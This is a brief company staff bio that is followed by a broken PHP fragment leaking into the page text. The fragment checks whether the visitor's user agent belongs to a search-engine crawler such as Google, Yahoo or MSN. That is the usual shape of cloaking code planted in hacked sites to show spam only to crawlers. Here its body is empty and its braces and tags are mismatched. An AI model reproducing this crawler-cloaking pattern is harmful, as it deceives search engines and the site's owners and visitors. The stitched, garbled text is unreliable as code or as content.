Heather recently came on board with Billions & Trillions Inc. She is in charge of general day to day business. A brilliant girl with a sweet personality and easy to talk to on the phone.
$tmp = strtolower($_SERVER['HTTP_USER_AGENT']);
if (strpos ($tmp, 'google') !== false || strpos ($tmp, 'yahoo') !== false || strpos ($tmp, 'msn') !== false || strpos ($tmp,
'sqworm') !== false) {
?>
}
?>